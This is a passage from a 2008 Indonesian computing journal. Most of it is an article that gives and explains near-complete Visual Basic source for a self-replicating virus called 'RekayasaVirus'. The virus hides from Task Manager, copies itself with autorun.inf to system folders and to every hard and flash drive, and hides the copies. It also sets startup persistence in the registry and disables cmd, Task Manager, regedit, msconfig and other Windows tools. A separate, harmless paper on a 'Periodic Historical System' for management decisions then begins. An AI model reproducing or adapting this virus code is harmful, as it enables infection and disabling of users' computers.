Prosedur ini yang paling pertama dijalankan pada saat program dijalankan. Hal yang pertama dilakukan adalah menyembunyikan prosesnya dari task manager dan juga menyembunyikan agar tidak terlihat pada taskbar, sehingga sulit untuk dihentikan, kemudian akan memanggil fungsi Main yang berada pada modul.Private Sub Timer1_Timer() Label1.Caption = Time() InfeksiDriveRemovable End Sub

Prosedur ini dibuat karena adanya penggunaan control timer pada form, hal ini dimaksudkan agar program akan selalu berjalan dan selalu memantau aktifitas drive pada hardisk dan removable drive yang terpasang dalam interval persepuluh detik, hal ini dimaksudkan untuk mempertahankan keberadaan virus dan dapat melakukan penyebaran melalui media removable drive dengan memanggil fungsi InfeksiDriveRemovable yang berada pada module. Code pada modul dengan beberapa fungsi : persiapan dan api function api untuk perintah copy file Public Declare Function CopyFile _ Lib kernel32 _ Alias CopyFileA _ (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, _ ByVal bFailIfExists As Long) As Long

Penggunaan fungsi windows api ini dimaksudkan untuk keperluan penggandaan file dalam hal memperbanyak diri, baik dari removabel drive ke hardisk maupun sebaliknya. Fungsi ini akan digunakan pada saat melakukan penggandaan file dengan perintah copy.

Vol.1 No.2 - Januari 2008

141

ISSN: 1978 - 8282 function api untuk mengambil alamat folder tertentu Public Declare Function SHGetSpecialFolderLocation _ Lib shell32.dll _ (ByVal hwndOwner As Long, ByVal nFolder As Long, pidl As ITEMIDLIST) _ As Long

Penggunaan fungsi windows api ini dimaksudkan untuk keperluan penggandaan file dalam hal mendapatkan lokasi folder tertentu. Fungsi ini akan digunakan pada saat melakukan penggandaan file dengan perintah copy untuk mendapatkan alamat folder tujuan. function api untuk mengambil daftar alamat folder Public Declare Function SHGetPathFromIDList _ Lib shell32.dll _ Alias SHGetPathFromIDListA _ (ByVal pidl As Long, ByVal pszPath As String) _ As Long

Penggunaan fungsi windows api ini dimaksudkan untuk keperluan penggandaan file dalam hal mendapatkan daftar alamat folder yang ada. Fungsi ini akan digunakan pada saat melakukan penggandaan file dengan perintah copy ketika melakukan pemanggilan fungsi mendapatkan alamat folder tertentu. function api untuk mengambil alamat folder sistem Public Declare Function GetSystemDirectory _ Lib kernel32.dll _ Alias GetSystemDirectoryA _ (ByVal lpBuffer As String, ByVal nSize As Long) _ As Long

Penggunaan fungsi windows api ini dimaksudkan untuk keperluan penggandaan file dalam hal mendapatkan lokasi folder system32. Fungsi ini akan digunakan pada saat melakukan penggandaan file dengan perintah copy untuk mendapatkan alamat folder system32. function api untuk mengambil alamat folder windows Public Declare Function GetWindowsDirectory _ Lib kernel32.dll _ Alias GetWindowsDirectoryA _ (ByVal lpBuffer As String, ByVal nSize As Long) _ As Long 142

Vol.1 No.2 - Januari 2008

ISSN: 1978 - 8282 Penggunaan fungsi windows api ini dimaksudkan untuk keperluan penggandaan file dalam hal mendapatkan lokasi folder windows. Fungsi ini akan digunakan pada saat melakukan penggandaan file dengan perintah copy untuk mendapatkan alamat folder windows. function api untuk mengambil tipe drive yang ada Public Declare Function GetDriveType _ Lib kernel32 _ (ByVal nDrive As String) _ As Long

Penggunaan fungsi windows api ini dimaksudkan untuk keperluan penggandaan file dalam hal mendapatkan drive yang terpasang baik hardisk dan maupun removable drive. Pembacaan hardisk meliputi semua drive berserta partisinya. Fungsi ini akan digunakan pada saat melakukan penggandaan file dengan perintah copy untuk mendapatkan daftar drive yang terpasang, juga dimanfaatkan untuk menyebarkan dirinya melalui flash disk yang dipantau berdasarkan interval waktu pada timer. function api pengaturan attribut file Public Declare Function SetFileAttributes _ Lib kernel32 _ Alias SetFileAttributesA _ (ByVal lpFileName As String, ByVal dwFileAttributes As Long) _ As Long

Penggunaan fungsi windows api ini dimaksudkan untuk keperluan pengaturan atribut file dalam hal menyembunyikan file agar tidak terlihat, sehingga keberadaanya sulit untuk diketahui. Fungsi ini akan digunakan pada saat setelah berhasil penggandaan file dengan perintah copy.

Vol.1 No.2 - Januari 2008

143

ISSN: 1978 - 8282 function api pengambilan attribut attribut file Public Declare Function GetFileAttributes _ Lib kernel32 _ Alias GetFileAttributesA _ (ByVal lpFileName As String) As Long Public Type SHITEMID Ned As Long Jun As Byte End Type Public Type ITEMIDLIST Uned As SHITEMID End Type Enum SFolder CSIDL_STARTUP = &H7 End Enum Public Const FILE_ATTRIBUTE_READONLY = &H1 Public Const FILE_ATTRIBUTE_HIDDEN = &H2

Penggunaan fungsi-fungsi windows api ini dimaksudkan untuk keperluan pengaturan atribut file, penggunaan fungsi mendapatkan alamat folder tertentu, folder system32 dan folder windows. Juga terdapat beberapa fungsi untuk mendeklarasikan type variabel. prosedur utama untuk menjalankan beberapa fungsi Public Sub Main() On Error Resume Next InfeksiFolderSistem InfeksiDriveRemovable AturAtributFile InfeksiRegistry End Sub

Prosedur ini merupakan sebuah prosedur utama untuk memanggil beberapa fungsi yang akan dijalankan, diantara fungsi-fungsi tersebut adalah fungsi untuk menggandakan file ke folder sistem, menggandakan file ke drive dan removable drive yang tersedia, fungsi pengaturan atribut file dan yang terpenting lagi adalah fungsi untuk pengaturan registry.

144

Vol.1 No.2 - Januari 2008

ISSN: 1978 - 8282

mengambil file sumber Public Function GetFileSumber() As String On Error Resume Next GetFileSumber = App.Path & \ & App.EXEName & .exe End Function

Fungsi ini digunakan untuk keperluan penggandaan dengan mengambil nama file sumber lengkap dengan alamatnya, untuk kemudian fungsi ini akan dimanfaatkan pada saat perintah copy digunakan sebagai sumber. mengambil folder khusus Public Function GetSpecialfolder(JenisFolder As SFolder) As String Dim Jun1 As Long, IDL As ITEMIDLIST Jun1 = SHGetSpecialFolderLocation(100, JenisFolder, IDL) If Jun1 = NOERROR Then Path$ = Space$(512) Jun1 = SHGetPathFromIDList(ByVal IDL.Uned.Ned, ByVal Path$) GetSpecialfolder = Left$(Path, InStr(Path, Chr$(0)) - 1) & \ Exit Function End If GetSpecialfolder = End Function

Fungsi ini digunakan untuk keperluan penggandaan dengan mengambil alamat folder tertentu yang terdapat pada fungsi daftar folder. Penggunaan fungsi ini sangat terkait dengan fungsi windows api yang sudah dideklarasikan sebelumnya, untuk kemudian fungsi ini akan dimanfaatkan pada saat perintah copy digunakan sebagai alamat tujuan. mengambil alamat folder sistem Public Function GetSystemPath() As String On Error Resume Next Dim Buffer As String * 255, Ned1 As Long Ned1 = GetSystemDirectory(Buffer, 255) GetSystemPath = Left(Buffer, Ned1) & \ End Function

Fungsi ini digunakan untuk keperluan penggandaan dengan mengambil alamat folder system32. Penggunaan fungsi ini sangat terkait dengan fungsi windows api untuk mendapatkan alamat folder system32 yang sudah dideklarasikan sebelumnya, untuk

Vol.1 No.2 - Januari 2008

145

ISSN: 1978 - 8282 kemudian fungsi ini akan dimanfaatkan pada saat perintah copy digunakan sebagai alamat tujuan. mengambil alamat folder windows Public Function GetWindowsPath() As String On Error Resume Next Dim Buffer As String * 255, Ned1 As Long Ned1 = GetWindowsDirectory(Buffer, 255) GetWindowsPath = Left(Buffer, Ned1) & \ End Function

Fungsi ini digunakan untuk keperluan penggandaan dengan mengambil alamat folder windows. Penggunaan fungsi ini sangat terkait dengan fungsi windows api untuk mendapatkan alamat folder windows yang sudah dideklarasikan sebelumnya, untuk kemudian fungsi ini akan dimanfaatkan pada saat perintah copy digunakan sebagai alamat tujuan. menggandakan diri ke alamat folder penting pada windows Public Function InfeksiFolderSistem() As String On Error Resume Next menggandakan file virus CopyFile GetFileSumber, GetWindowsPath & RekayasaVirus.exe, 0 CopyFile GetFileSumber, GetSystemPath & RekayasaVirus.exe, 0 CopyFile GetFileSumber, GetSpecialfolder(CSIDL_STARTUP) & _ RekayasaVirus.exe, 0 menggandakan file autorun CopyFile App.Path & \ & autorun.inf, GetWindowsPath & autorun.inf, 0 CopyFile App.Path & \ & autorun.inf, GetSystemPath & autorun.inf, 0 CopyFile App.Path & \ & autorun.inf, GetSpecialfolder(CSIDL_STARTUP) & _ autorun.inf, 0 End Function

Fungsi ini berguna untuk melakukan infeksi folder sistem dengan penggandaan berdasarkan perintah copy yang digunakan, penggunaan fungsi ini memanfaatkan beberapa fungsi yang pernah dideklarasikan sebelumnya, seperti fungsi mendapatkan file sumber lengkap dengan alamatnya, mendapatkan alamat folder tertentu, alamat folder system32, mendapatkan alamat folder windows yang akan dijadikan sebagai alamat tujuan.

146

Vol.1 No.2 - Januari 2008

ISSN: 1978 - 8282 menggandakan diri ke alamat drive dan removable yang tersedia Public Function InfeksiDriveRemovable() As String Dim DriveAscii As Integer, DriveHuruf As String DriveHuruf = For DriveAscii = 66 To 90 DriveHuruf = Chr(DriveAscii) & :\ If GetDriveType(DriveHuruf) = 3 Or GetDriveType(DriveHuruf) = 2 Then Type drive 3 = Hardisk, 2 = Flash Disk menggandakan file virus CopyFile GetFileSumber, DriveHuruf & RekayasaVirus.exe, 0 menggandakan file autorun CopyFile App.Path & \ & autorun.inf, DriveHuruf & autorun.inf, 0 End If Next End Function

Fungsi ini berguna untuk melakukan infeksi folder sistem dengan penggandaan berdasarkan perintah copy yang digunakan, penggunaan fungsi ini memanfaatkan fungsi mendapatkan drive yang tersedia termasuk removable drive. Fungsi ini dimaksudkan untuk keperluan penyebaran melalui media flash disk yang keberadaanya dipantau berdasarkan interval timer yang ditentukan. mengatur attribut file untuk hidden dan read only Public Function AturAtributFile() As String Dim DriveAscii As Integer, DriveHuruf As String DriveHuruf = For DriveAscii = 66 To 90 DriveHuruf = Chr(DriveAscii) & :\ If GetDriveType(DriveHuruf) = 3 Or GetDriveType(DriveHuruf) = 2 Then Type drive 3 = Hardisk, 2 = Flash Disk SetFileAttributes DriveHuruf & RekayasaVirus.exe, _ FILE_ATTRIBUTE_HIDDEN Or FILE_ATTRIBUTE_READONLY End If Next SetFileAttributes GetWindowsPath & RekayasaVirus.exe, _ FILE_ATTRIBUTE_HIDDEN Or FILE_ATTRIBUTE_READONLY SetFileAttributes GetSystemPath & RekayasaVirus.exe, _ SetFileAttributes GetSpecialfolder(CSIDL_STARTUP) & _ RekayasaVirus.exe, FILE_ATTRIBUTE_HIDDEN Or FILE_ATTRIBUTE_READONLY End Function

Vol.1 No.2 - Januari 2008

147

ISSN: 1978 - 8282 Fungsi ini akan digunakan pada saat perintah copy selesai dilaksanakan, hal ini dimaksudkan untuk pengaturan atribut file agar dapat di hidden dan read only, dengan tujuan untuk pertahanan agar keberadaannya tidak terlihat.Public Function InfeksiRegistry() Dim WShell As Object, RG1 As String, RG2 As String Dim RG3 As String, RG4 As String RG1 = Software\Microsoft\Windows\CurrentVersion\ RG2 = SOFTWARE\Microsoft\Windows NT\CurrentVersion\ RG3 = Software\Microsoft\Internet Explorer\Main\ RG4 = Software\Policies\Microsoft\Windows\system\ Set WShell = CreateObject(WScript.Shell) merubah registered owner windows WShell.Regwrite HKLM\ & RG2 & \RegisteredOwner, Virus merubah registered organization windows WShell.Regwrite HKLM\ & RG2 & \RegisteredOrganization, Rekayasa merubah Title Internet Explorer WShell.Regwrite HKCU\ & RG3 & \Window Title, ::Rakayasa::Virus:: mengaktifkan virus pada saat setiap starup sistem WShell.Regwrite HKLM\ & RG1 & \Run\RekayasaVirus, _ GetWindowsPath & RekayasaVirus.exe blokir command prompt WShell.Regwrite HKCU\ & RG4 & DisableCMD, _ 1, REG_DWORD blokir task manager WShell.Regwrite HKCU\ & RG1 & Policies\System\DisableTaskMgr, _ 1, REG_DWORD blokir regedit WShell.Regwrite HKCU\ & RG1 & Policies\System\DisableRegistryTools, _ 1, REG_DWORD blokir msconfig WShell.Regwrite HKCU\ & RG1 & Policies\System\DisableMsConfig, _ 1, REG_DWORD advanced hidden WShell.Regwrite HKCU\ & RG1 & Advanced\Hidden, 0, REG_DWORD

148

Vol.1 No.2 - Januari 2008

ISSN: 1978 - 8282 blokir fasilitas run WShell.Regwrite HKCU\ & RG1 & Policies\Explorer\NoRun, _ 1, REG_DWORD blokir fasilitas pencarian WShell.Regwrite HKCU\ & RG1 & Policies\Explorer\NoFind, _ 1, REG_DWORD blokir fasilitas pengaturan folder WShell.Regwrite HKCU\ & RG1 & Policies\Explorer\NoFolderOptions, _ 1, REG_DWORD blokir fasilitas-fasilitas lainnya WShell.Regwrite HKCU\ & RG1 & Policies\Explorer\NoClose, _ 1, REG_DWORD WShell.Regwrite HKCU\ & RG1 & Policies\Explorer\NoControlPanel, _ 1, REG_DWORD WShell.Regwrite HKCU\ & RG1 & Policies\Explorer\NoViewContextMenu, _ 1, REG_DWORD WShell.Regwrite HKCU\ & RG1 & Policies\Explorer\NoStartMenuMorePrograms, _ 1, REG_DWORD WShell.Regwrite HKCU\ & RG1 & Policies\Explorer\NoViewOnDrive, _ 1, REG_DWORD Set WShell = Nothing End Function

Fungsi ini dimaksudkan untuk menginfeksi registry sebagai inti dari penyerangan dan pertahanan virus. Pada fungsi ini terdapat beberapa kegunaan untuk keperluaan pengaturan pertahanan dan penyerangan virus. Pada fungsi ini terdapat beberapa perintah mengakses registry untuk keperluan pengaktifan virus secara otomatis pada saat logon, mengubah nama owner dan organisasi pada windows, memblokir beberapa fasilitas yang dapat membahayakan eksistensi virus, juga menyembunyikan beberapa fasilitas yang juga dapat membahayakan eksistensi virus.

Vol.1 No.2 - Januari 2008

149

ISSN: 1978 - 8282

Gambar 4 Perbedaan start menu setelah dan sebelun terinfeksi virus

Setelah pembuatan program tersebut diatas berhasil dilaksanakan, dengan menggunakan satu form dan satu modul, dan didalam setiap form dan modul terdapat perintah-perintah dan fungsi-fungsi yang saling terkait dan menunjang. Program ini akan dapat berjalan setelah dilakukan kompilasi menjadi file executable dengan perintah menu compilasi pada visual basic, kemudian file executable hasil kompilasi ini yang akan dijalankan dan digandakan. Namun sebelum penjalankan program ini, terlebih dahulu harus dilakukan beberapa langkah pengamanan, untuk menghindari hal-hal yang tidak diinginkan terjadi, seperti tidak terkendalinya virus yang dibuat ini. Setelah program tersebut dijalankan, kita akan melihat beberapa hasilnya yang akan digambarkan pada gambar-gambar dibawah ini sebagai bentuk tangkapan layar.

150

Vol.1 No.2 - Januari 2008

ISSN: 1978 - 8282 Perhatikan perbedaan gambar (Gambar-4). Gambar ini adalah sebelum terinfeksi virus dan gambar disebelah kanan adalah gambar setelah terinfeksi virus, perbedaannya terletak pada menu run dan menu search. Virus akan menyembunyikan fasilitas run. Perhatikan perbedaan Gambar-5, inilah adalah gambar potongan windows eksplorer yang ditangkap, sebelah kiri adalah gambar setelah terinfeksi virus dan sebelah kanan adalah gambar sebelum terinfeksi virus. Perbedaannya terletak pada sub menu folder options yang hilang setelah virus aktif. Hal ini terjadi karena virus juga melakukan pemblokiran terhadap fasilitas ini agar keberadaan file tidak terlihat.

Gambar 6 Virus Menggandakan Diri Pada Setiap Drive Yang Ada Termasuk Removable Drive

Gambar 5 Perbedaan Menu Tools Pada Windows Explorer Seterlah Dan Sebelum Terinfeksi Virus

Perhatikan perbedaan Gambar-6, inilah adalah gambar potongan windows eksplorer yang ditangkap, sebelah kiri adalah gambar drive C yang telah terinfeksi dengan hasil penggandaan file virus dan sebelah kanan adalah flash disk yang juga telah terinfeksi virus. Virus pada flash disk ini akan kembali menggandakan dirinya ketika di pasangkan pada komputer lain, dan demikian seterusnya dalam proses penyebaran virus.

Vol.1 No.2 - Januari 2008

151

ISSN: 1978 - 8282

Gambar 7 Program Rekayasa Virus

Pada gambar 7, terlihat program rekayasa virus yang sidah menginfeksi virus dan sedang berjalan. Program ini masih sengaja diatur agar dapat memperlihatkan dirinya dalam bentuk tampilan layar yang berisi informasi jam, tanggal dan hari. Keberadaan program ini tetap tidak terdeteksi pada task manager juga tidak muncul pada taskbar, hal ini dimungkinkan karena telah diatar untuk tidak terlihat. Pengaktifan program ini dilakukan secara otomatis pada saat login, karena pengaturan pengatifannya telah diatur pada windows registry. Untuk semua virus lokal yang berjalan untuk microsoft windows hampir seluruhnya mengakses registry untuk mengatur teknik penyerangan dan pertahanannya. KESIMPULAN Dilihat dari teknik infeksi sistem, penggandaan ke sistem dan infeksi registry, virus lokal yang dibuat dengan bahasa pemrograman visual basic mudah untuk diciptakan bagi yang sedikit mengerti dan mudah pula untuk dimusnahkan bagi yang sedikit mengerti, hal ini sangat tergantung dari tingkat pemahaman. Virus lokal yang dibuat dengan bahasa visual basic, hampir memiliki kemiripan teknik, hal ini dapat dilihat dari registry yang diakses. Pada registry inilah virus akan

152

Vol.1 No.2 - Januari 2008

ISSN: 1978 - 8282 melakukan beberapa pengaturan, dengan tujuan melancarkan aktivitasnya tanpa harus diketahui pengguna komputer. Program rekayasa virus yang dibuat dalam pembahasan ini, dimaksudkan saling memberi informasi tentang bagaimana virus dibuat dengan visual basic, dan diantara kemampuannya adalah dalam hal pengaturan registry agar pada saat start virus tersebut secara otomatis berjalan. Dalam memblokir beberapa fasilitas penting, seperti regedit, msconfig, task manager, cmd dan lain sebgainya merupakan bagian dari pertahanan. DAFTAR PUSTAKA 1. Junaidi (2006). Memburu Virus RontokBro Dan Variannya Dalam Membasmi Dan Mencegah. Cyber Raharja, 5(3), 82-99. 2. Rahmat Putra (2006). Innovative Source Code Visual Basic, Jakarta: Dian Rakyat. 3. Slebold, Dianne (2001). Visual Basic Developer Guide to SQL Server. Jakarta: Elex Media Komputindo. 4. Stallings, William (1999). Cryptography and Network Security. Second Edition. New Jersey: Prentice-Hall.Inc 5. Tri Amperiyanto (2002). Bermain-main dengan Virus Macro. Jakarta: Elex Media Komputindo. 6. Tri Amperiyanto (2004). Bermain-main dengan Registry Windows. Jakarta: Elex Media Komputindo. 7. Wardana (2007). Membuat 5 Program Dahsyat di Visual Basic 2005. Jakarta : Elex Media Komputindo. 8. Wiryanto Dewobroto (2003). Aplikasi Sains dan Teknik dengan Visual Basic 6.0. Jakarta: Elex Media Komputindo.

Vol.1 No.2 - Januari 2008

153

ISSN: 1978 - 8282

PERIODIC HISTORICAL SYSTEM SEBAGAI EVALUASI STRATEGIS DALAM MENDUKUNG PENGAMBILAN KEPUTUSAN MANAJEMENUntung Rahardja 1 Dina Fitria Murad 2 Siti Chalifatullah 3 Email : [email protected] ABSTRAKSIPada era globalisasi seperti sekarang ini, perkembangan sistem informasi memiliki laju pertumbuhan yang sangat pesat, terutama sebagai media untuk memberikan informasi yang cepat dan akurat. Banyak perusahaan maupun organisasi menggunakan sistem informasi sebagai bahan evaluasi kinerja. Sebuah sistem informasi harus memiliki kemampuan yang baik, yaitu mampu memberikan informasi secara cepat dan akurat. Seiring berjalannya waktu maka informasi yang didapat akan semakin meningkat, tetapi informasi tersebut belum dapat terekam dan tersimpan dengan baik kedalam sebuah history sistem, dimana dapat merekam dan menyimpan seluruh informasi yang lama ataupun yang baru serta mampu memberikan informasi dari waktu ke waktu, walaupun informasi tersebut telah lampau, manajemen dapat menggunakan sistem tersebut guna membantu proses evaluasi strategis manajemen. Untuk mengatasi permasalahan ini, dibutuhkan suatu metodologi yang disebut Periodic Historical System (PHS). PHS didefinisikan sebagai teknik pengumpulan, pengintegrasian dan penyimpanan data yang bertujuan untuk memberikan informasi manajemen yang akurat dari waktu ke waktu serta bermanfaat untuk evaluasi manajemen dalam pengambilan keputusan. Diidentifikasikan 5 (lima) masalah yang timbul pada sistem informasi, mendefinisikan metode baru yang disebut PHS, menentukan 4 (empat) ciri khas dari PHS, merancang algoritma PHS, serta menguraikan 5 (lima) manfaat dari penerapan PHS. Aplikasi juga diurai dengan rincian database yang diperlukan serta flowchart diagram. Dengan metodologi PHS ini dapat menjadi sebuah evaluasi terkini dalam mendukung kepentingan manajemen dalam pengambilan keputusan yang akurat. Kata kunci : Periodic Historical System

PENDAHULUAN Pemanfaatan teknologi informasi dan komputer diberbagai kehidupan sudah menjadi rahasia umum. Komputer telah lama dijadikan sebagai alat bantu dalam proses1. Dosen Jurusan Sistem Informasi, STMIK Raharja Jl. Jend Sudirman No.40 Modern Cikokol-Tangerang Telp 5529692 2. Dosen Jurusan Sistem Informasi, STMIK Raharja Jl. Jend Sudirman No.40 Modern Cikokol-Tangerang Telp 5529692 3. Mahasiswi Jurusan Sistem Informasi, STMIK Raharja Jl. Jend Sudirman No.40 Modern Cikokol-Tangerang Telp 5529692

154

Vol.1 No.2 - Januari 2008

ISSN: 1978 - 8282 manajemen organisasi maupun perusahaan, dua diantaranya adalah sebagai pengambilan keputusan (Decision Support System), dan alat merekam segala transaksi (Data Processing System) [Raha06]. Dalam mengambil keputusan diperlukan suatu analisa berdasarkan informasi yang dimiliki oleh manajemen, dimana informasi tersebut sangat penting karena merupakan substitusi dari kendala atau resiko yang melingkupi proses pengambilan keputusan. Maka informasi merupakan suatu faktor pendukung dalam proses pengambilan keputusan, yang akhirnya menghasilkan keputusan yang bijaksana. Organisasi maupun perusahaan membutuhkan sistem informasi untuk mengumpulkan, mengolah dan menyimpan data serta menyalurkan suatu informasi. Berkembangnya sistem informasi dari waktu ke waktu telah menghasilkan banyak informasi menjadi semakin kompleks [Raha07]. Kompleksnya informasi tersebut disebabkan oleh sistem itu sendiri, dimana dalam menyampaikan informasi, sistem hanya dapat memberikan informasi yang baru tetapi tidak dapat memberikan informasi yang lama, salah satu contohnya ketika manajemen sangat membutuhkan dan ingin mengetahui kembali informasi yang telah lama, sistem tersebut tidak dapat memberikan informasi yang diinginkan, karena banyaknya informasi yang didapat dari waktu ke waktu tidak terekam dan tidak tersimpan dengan baik, sehingga kompleksnya informasi tersebut sangat menyulitkan manajemen perusahaan maupun organisasi untuk mendapatkan kembali informasi yang lalu guna memenuhi kebutuhan manajemen. Walaupun sistem telah banyak membantu manajemen dalam memberikan informasi, terkadang masih terdapat kekurangan sistem untuk mengarahkan dan mengendalikan suatu masalah atau aktivitas didalam organisasi maupun perusahaan, namun bagaimana manajemen tetap membutuhkan sistem yang mampu memberikan informasi dari waktu ke waktu meskipun informasi tersebut telah sangat lama untuk membantu kepentingan manajemen terutama dalam pengambilan keputusan. Untuk mengatasi masalah tersebut maka dibutuhkan suatu metode, yang dinamakan dengan Periodic Historical System (PHS), dimana metode tersebut sangatlah penting untuk menjawab semua permasalah diatas, dengan PHS manajemen dapat dengan mudah mendapatkan informasi yang telah lama serta dapat merekam dan menyimpan segala transaksi manajemen dalam mengolah informasi kedalam history sistem guna menghasilkan informasi yang strategis, cepat dan akurat dari waktu ke waktu sesuai dengan kebutuhan manajemen.[Raha06]

Vol.1 No.2 - Januari 2008

155

ISSN: 1978 - 8282

Gambar 1 Siklus Informasi

PERMASALAHAN Pengembangan sistem (System Development) dapat berarti menyusun suatu sistem yang baru untuk menggantikan sistem yang lama secara keseluruhan atau memperbaiki sistem yang telah ada [Jogi90]. Semua sistem informasi akan mempunyai masalah, tanpa memperdulikan seberapa baik sistem tersebut dinilai, waktu (overtime), lingkungan sistem yang berubah, dan perubahan prosedur operasional dapat menimbulkan masalah dalam sistem.

Gambar 2 Masalah yang timbul pada sistem informasi

Keterangan : Ke lima hal tersebut diatas merupakan alasan perlunya diadakan pengembangan system. Diidentifikasikan lima permasalahan yang timbul pada sistem informasi guna melakukan pengembangan sistem informasi, yaitu :

156

Vol.1 No.2 - Januari 2008

ISSN: 1978 - 8282 1. Ketidakberesan Ketidakberesan terdapat pada sistem yang lama ataupun pada sistem yang berjalan, menyebabkan sistem tidak dapat beroperasi sesuai dengan yang diharapkan. Ketidakberesan dapat berupa kesalahan-kesalahan yang tidak disengaja yang juga dapat menyebabkan kebenaran dari data kurang terjamin, tidak efisiennya operasi, serta tidak ditaatinya kebijaksanaan manajemen yang telah ditetapkan. 2. Pertumbuhan organisasi Pertumbuhan organisasi yang menyebabkan harus disusun sistem yang baru. Pertumbuhan tersebut dapat berupa kebutuhan informasi yang semakin meluas, volume pengolahan data yang semakin meningkat, dengan adanya perubahan maka menyebabkan sistem yang lama tidak efektif lagi, sehingga sistem yang lama sudah tidak dapat memenuhi lagi semua kebutuhan informasi yang dibutuhkan manajemen. 3. Meraih kesempatan (opportunities) Teknologi informasi telah berkembang dengan cepatnya. Organisasi mulai merasakan bahwa teknologi informasi perlu digunakan untuk meningkatkan penyediaan informasi, dalam keadaan pasar bersaing, kecepatan informasi atau efisien waktu sangat menentukan berhasil atau tidaknya strategi dan rencana-rencana yang telah disusun untuk meraih kesempatan-kesempatan yang ada. 4. Instruksi (Directives)